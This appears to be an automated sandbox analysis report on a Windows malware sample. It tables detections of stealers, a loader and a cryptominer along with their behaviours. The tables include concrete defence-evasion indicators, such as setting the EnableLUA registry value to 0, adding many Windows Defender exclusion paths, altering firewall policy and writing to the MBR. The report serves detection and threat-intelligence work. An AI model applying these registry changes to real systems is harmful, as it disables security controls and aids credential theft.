Analysis Overview
SHA256
fbe40f767788ac5d1b503e9b639711db6152a0b5e623d131b05381f02de957b1
Threat Level: Known bad
The file SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe was found to be: Known bad.
Malicious Activity Summary
RedLine
Detect Vidar Stealer
UAC bypass
xmrig
Stealc
Vidar
Windows security bypass
Modifies firewall policy service
Amadey
PrivateLoader
RedLine payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Sets service image path in registry
Drops file in Drivers directory
Blocklisted process makes network request
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Identifies Wine through registry keys
Reads data files stored by FTP clients
UPX packed file
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Checks BIOS information in registry
Writes to the Master Boot Record (MBR)
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks for any installed AV software in registry
Looks up external IP address via web service
Adds Run key to start application
Checks installed software on the system
Drops Chrome extension
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Unsigned PE
Program crash
Enumerates physical storage devices
NSIS installer
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Modifies registry class
Runs ping.exe
Enumerates system info in registry
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Modifies data under HKEY_USERS
Enumerates processes with tasklist
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Modifies system certificate store
Suspicious use of FindShellTrayWindow
System policy modification
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-30 16:21
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-30 16:21
Reported
2024-05-30 16:23
Platform
win7-20240215-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Amadey
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\POakPvFxeBVc9spYxvgYniad.exe | N/A |
PrivateLoader
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
Vidar
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YLgKyOFzWxOqC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ZmzskowerwXEonlG = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YLgKyOFzWxOqC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ZmzskowerwXEonlG = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fcblnlcRRSrBhAVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\fcblnlcRRSrBhAVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ZmzskowerwXEonlG = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nFLFFjqrQPUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tegRANPZONsU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nFLFFjqrQPUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tegRANPZONsU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JipyTrDkU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ZmzskowerwXEonlG = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JipyTrDkU = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\krdeMCnRKomDOvwVunR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\krdeMCnRKomDOvwVunR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\360Camera64.sys | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Windows\system32\drivers\360AntiHacker64.sys | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Windows\system32\drivers\360AvFlt.sys | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360AntiHacker\ImagePath = "System32\\Drivers\\360AntiHacker64.sys" | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360AvFlt\ImagePath = "system32\\DRIVERS\\360AvFlt.sys" | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS2BF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHSafeTray.exe\" /start" | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Eset\NOD\CurrentVersion\Info | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Avira | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Eset\NOD\CurrentVersion\Info | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Pictures\K1cMIEpl35iIMRssKBcYXhPh.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\asVPZnM.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\POakPvFxeBVc9spYxvgYniad.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\POakPvFxeBVc9spYxvgYniad.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\POakPvFxeBVc9spYxvgYniad.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\POakPvFxeBVc9spYxvgYniad.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\asVPZnM.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1316 set thread context of 1824 | N/A | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 2752 set thread context of 1728 | N/A | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | C:\Windows\system32\conhost.exe |
| PID 2752 set thread context of 2432 | N/A | C:\ProgramData\wikombernizc\reakuqnanrkn.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\360\Total Security\netmon\gameidentify.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\lang\de\SysSweeper.ui.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pl\AntiAdwa.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\de\ipc\yhregd.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\ja\ipc\yhregd.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\softmgr\SML\Skin\SML_TaskBar.uiz | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\360Tray.exe | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\SDPlugin\PopWndTracker.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\es\safemon\Safemon.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
